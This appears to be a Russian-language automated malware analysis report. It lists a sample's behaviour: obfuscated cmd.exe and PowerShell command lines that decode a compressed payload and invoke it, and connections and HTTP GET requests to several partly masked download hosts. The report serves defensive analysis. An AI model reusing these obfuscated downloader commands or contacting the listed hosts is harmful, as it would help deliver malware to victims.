Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' CmD /c "SEt CwymA= ^& ((VAriable '*mdr*').nAmE[3,11,2]-JOIn'')(nEw-oBJECt systEM.Io.STreAMReaDer(( nEw-oBJECt iO.comPReSsIoN.deFLaTeSTreaM([sYsTEm.IO.MeMORysTream] [sySTEM.cONVerT]::from...
Сетевая активность
Подключается к
- 'tv###dze.com':80
- 'ar#####pharmacy.com.au':80
- 'du##n.net':80
- 'mi###rumum.com':80
- 'bd#.org.br':80
TCP
Запросы HTTP GET
- http://tv###dze.com/8
- http://ar#####pharmacy.com.au/Sq
- http://mi###rumum.com/ZQrQRYQ7
- http://www.bd#.org.br/BtoVJ
UDP
- DNS ASK tv###dze.com
- DNS ASK ar#####pharmacy.com.au
- DNS ASK du##n.net
- DNS ASK mi###rumum.com
- DNS ASK bd#.org.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' CmD /c "SEt CwymA= ^& ((VAriable '*mdr*').nAmE[3,11,2]-JOIn'')(nEw-oBJECt systEM.Io.STreAMReaDer(( nEw-oBJECt iO.comPReSsIoN.deFLaTeSTreaM([sYsTEm.IO.MeMORysTream] [sySTEM.cONVerT]::from...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ${e`X`ecu`T`ionCon`TexT}.\"I`NVo`KEcoM`MANd\".( \"{2}{1}{3}{0}\" -f 't','KE','inVo','ScRiP' ).Invoke( ( & (\"{1}{0}{2}\"-f'-','Get','ItEM') (\"{2}{0}{1}\"-f 'n','V:cwYma','e')).\"vA`lue\" ...
